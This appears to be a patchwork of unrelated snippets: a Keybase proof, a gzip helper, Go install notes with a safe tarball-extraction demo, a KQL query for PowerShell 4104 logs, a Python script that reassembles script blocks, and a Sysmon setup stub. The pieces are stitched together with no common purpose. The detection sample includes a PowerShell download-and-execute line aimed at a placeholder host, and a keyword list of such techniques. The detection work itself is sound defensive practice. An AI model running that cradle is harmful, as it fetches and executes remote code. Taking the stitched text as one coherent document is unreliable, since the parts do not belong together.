I hereby claim:
- I am mavjs on github.
- I am mavjs (https://keybase.io/mavjs) on keybase.
- I have a public key ASDiTsnsLVeolOAND9VB-1xXIrQN2ZEIm4IPafZizc2Ftgo
To claim this, I am signing this object:
import gzip
import io


def gzip_str(string_):
    """Return the gzip-compressed bytes of a str (UTF-8 encoded)."""
    out = io.BytesIO()
    # mode='w' writes a gzip stream into the in-memory buffer
    with gzip.GzipFile(fileobj=out, mode='w') as fo:
        fo.write(string_.encode())
    # the stream is only complete once the GzipFile has been closed
    bytes_obj = out.getvalue()
    return bytes_obj
If your $GOROOT is ~/goroot and your $GOPATH is ~/go, make sure the new Go release lands in $GOROOT itself rather than in a nested directory. By default the Go tarball unpacks with go/ as a prefix directory, so strip that prefix while unpacking with --strip-components=1 (VERSION must hold the release string of the tarball you downloaded):

tar -C ~/goroot -xzvf go$VERSION.linux-amd64.tar.gz --strip-components=1

Extracting over an existing ~/goroot does not remove files left by the previous release, so clear it first if you want a clean tree, and compare the tarball's SHA256 with the checksum published on go.dev/dl before unpacking.
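The effect of --strip-components=1 on the go/ prefix, shown as an added Python example that is not part of this note: it builds a constructed tarball shaped like the official release (every member under a leading go/ directory), unpacks it into a target directory with that first component dropped, and refuses any member that is not under go/ or that would escape the destination. The member names and the version string are made up for the demonstration; only the standard library is used.

```python
import io
import os
import tarfile
import tempfile


def build_fake_go_tarball(path, members=None):
    """Write a small .tar.gz whose members all sit under go/, like the
    official release archive. Member list is constructed sample input."""
    if members is None:
        members = (
            ("go/VERSION", b"go0.0.0-example\n"),
            ("go/bin/go", b"#!/bin/sh\necho fake go\n"),
            ("go/src/fmt/print.go", b"package fmt\n"),
        )
    with tarfile.open(path, "w:gz") as tar:
        for name, data in members:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))


def extract_strip_one(tarball, dest, prefix="go/"):
    """Unpack tarball into dest with the first path component removed,
    mirroring `tar -C dest --strip-components=1`. Members outside `prefix`
    or resolving outside dest are rejected rather than silently skipped."""
    os.makedirs(dest, exist_ok=True)
    real_dest = os.path.realpath(dest)
    written = []
    with tarfile.open(tarball, "r:gz") as tar:
        for member in tar.getmembers():
            if not member.name.startswith(prefix):
                raise ValueError(f"member outside {prefix}: {member.name}")
            rel = member.name[len(prefix):]
            if not rel:
                continue  # the go/ directory entry itself
            target = os.path.realpath(os.path.join(real_dest, rel))
            # commonpath guards against go/../x style names in the archive
            if os.path.commonpath([target, real_dest]) != real_dest:
                raise ValueError(f"path traversal in member: {member.name}")
            if member.isdir():
                os.makedirs(target, exist_ok=True)
                continue
            if not member.isfile():
                raise ValueError(f"refusing non-regular member: {member.name}")
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with tar.extractfile(member) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(rel)
    return written


def demo():
    """Extract the constructed tarball; return (files written, VERSION is
    directly under the target, no nested go/ directory was created)."""
    with tempfile.TemporaryDirectory() as tmp:
        tarball = os.path.join(tmp, "go-example.linux-amd64.tar.gz")
        goroot = os.path.join(tmp, "goroot")
        build_fake_go_tarball(tarball)
        files = extract_strip_one(tarball, goroot)
        return (sorted(files),
                os.path.isfile(os.path.join(goroot, "VERSION")),
                os.path.exists(os.path.join(goroot, "go")))


def demo_traversal_rejected():
    """A member named go/../evil must be refused, not written next to dest."""
    with tempfile.TemporaryDirectory() as tmp:
        tarball = os.path.join(tmp, "evil.tar.gz")
        build_fake_go_tarball(tarball, members=(("go/../evil", b"x\n"),))
        try:
            extract_strip_one(tarball, os.path.join(tmp, "goroot"))
        except ValueError:
            return not os.path.exists(os.path.join(tmp, "evil"))
        return False


if __name__ == "__main__":
    print(demo(), demo_traversal_rejected())
```

The traversal check is the part GNU tar also performs for you (it strips leading ../ by default); it is spelled out here so the reason the prefix is removed per member, rather than by moving a directory afterwards, is visible.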
// Extract the fields of PowerShell script block logging events (EventID 4104)
// from the Log Analytics Event table. The parameters follow the 4104 message
// template, in order: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path.
Event
| where EventID == "4104"
| extend ParsedEvent = parse_xml(strcat("<root>", ParameterXml, "</root>"))
| extend MessageNumber = tolong(ParsedEvent.root.Param[0])
| extend MessageTotal = tolong(ParsedEvent.root.Param[1])
// Param[2] is a plain string unless the element carries attributes, in which
// case parse_xml puts the script text under "#text"; handle both shapes.
| extend ScriptBlockElement = iff(
    strlen(tostring(ParsedEvent.root.Param[2]["#text"])) > 0,
    ParsedEvent.root.Param[2]["#text"],
    ParsedEvent.root.Param[2])
| extend ScriptBlockId = tostring(ParsedEvent.root.Param[3])
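Reassembling split script blocks offline, as an added Python example that is not part of the query above: PowerShell writes a long script block as several 4104 records that share one ScriptBlockId and are numbered MessageNumber of MessageTotal, so keyword matching on a single record can miss a token that was cut across two fragments. The three ParameterXml values below are constructed, including the ScriptBlockId GUIDs, the URL and the path; the keyword list is a minimal illustration, not a detection ruleset.

```python
import xml.etree.ElementTree as ET

# Constructed sample ParameterXml values for three EventID 4104 records: one
# script block split into two fragments (same ScriptBlockId) and one
# single-fragment block. Param order: MessageNumber, MessageTotal,
# ScriptBlockText, ScriptBlockId, Path. Note "DownloadString" is cut in half.
SAMPLE_EVENTS = [
    "<Param>1</Param><Param>2</Param>"
    "<Param>$c = New-Object System.Net.WebClient; IEX $c.Download</Param>"
    "<Param>aaaaaaaa-1111-2222-3333-444444444444</Param><Param></Param>",
    "<Param>2</Param><Param>2</Param>"
    "<Param>String('http://example.invalid/p')</Param>"
    "<Param>aaaaaaaa-1111-2222-3333-444444444444</Param><Param></Param>",
    "<Param>1</Param><Param>1</Param>"
    "<Param>Get-Process | Select-Object Name</Param>"
    "<Param>bbbbbbbb-1111-2222-3333-444444444444</Param>"
    "<Param>C:\\Scripts\\ps.ps1</Param>",
]

# Illustrative keywords only (assumed for the demo, not a tuned rule).
SUSPICIOUS = ("DownloadString", "Invoke-Expression", "-EncodedCommand",
              "FromBase64String")


def parse_4104(parameter_xml):
    """Mirror the KQL: wrap ParameterXml in <root> and pull the Params out."""
    root = ET.fromstring("<root>" + parameter_xml + "</root>")
    params = [(p.text or "") for p in root.findall("Param")]
    if len(params) < 4:
        raise ValueError("a 4104 record needs at least four Param elements")
    return {
        "MessageNumber": int(params[0]),
        "MessageTotal": int(params[1]),
        "ScriptBlockText": params[2],
        "ScriptBlockId": params[3],
        "Path": params[4] if len(params) > 4 else "",
    }


def reassemble(parameter_xml_records):
    """Group fragments by ScriptBlockId and join complete blocks in order.
    Blocks with missing fragments are left out rather than joined partially."""
    fragments = {}
    for rec in parameter_xml_records:
        ev = parse_4104(rec)
        fragments.setdefault(ev["ScriptBlockId"], {})[ev["MessageNumber"]] = ev
    blocks = {}
    for sbid, parts in fragments.items():
        total = next(iter(parts.values()))["MessageTotal"]
        if set(parts) != set(range(1, total + 1)):
            continue  # incomplete: not every fragment has been collected
        blocks[sbid] = "".join(parts[i]["ScriptBlockText"]
                               for i in range(1, total + 1))
    return blocks


def flag_per_record(parameter_xml_records):
    """Naive approach: match keywords fragment by fragment."""
    hits = set()
    for rec in parameter_xml_records:
        ev = parse_4104(rec)
        if any(k in ev["ScriptBlockText"] for k in SUSPICIOUS):
            hits.add(ev["ScriptBlockId"])
    return sorted(hits)


def flag_reassembled(parameter_xml_records):
    """Match keywords on the joined script block text instead."""
    blocks = reassemble(parameter_xml_records)
    return sorted(sbid for sbid, text in blocks.items()
                  if any(k in text for k in SUSPICIOUS))


if __name__ == "__main__":
    print("per record:", flag_per_record(SAMPLE_EVENTS))
    print("reassembled:", flag_reassembled(SAMPLE_EVENTS))
```

The same join can be done in KQL with summarize and make_list ordered by MessageNumber once the fields above are extracted; the Python version is here so the fragment boundary problem can be seen on sample input without a workspace.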
<#
Meta
Date: 2022 March 28th
Authors: Dray Agha (Twitter @purp1ew0lf)
Company: Huntress Labs
Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab.
#>
function admin_check{
    # Installing Sysmon needs an elevated session, so bail out early if the
    # current token is not in the local Administrators role.
    if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(`
        [Security.Principal.WindowsBuiltInRole]::Administrator)) {
        # The gist is cut off after the IsInRole( line above; the role argument
        # and this body are the standard completion of the idiom, assumed here.
        Write-Warning "Run this script from an elevated PowerShell session."
        exit 1
    }
}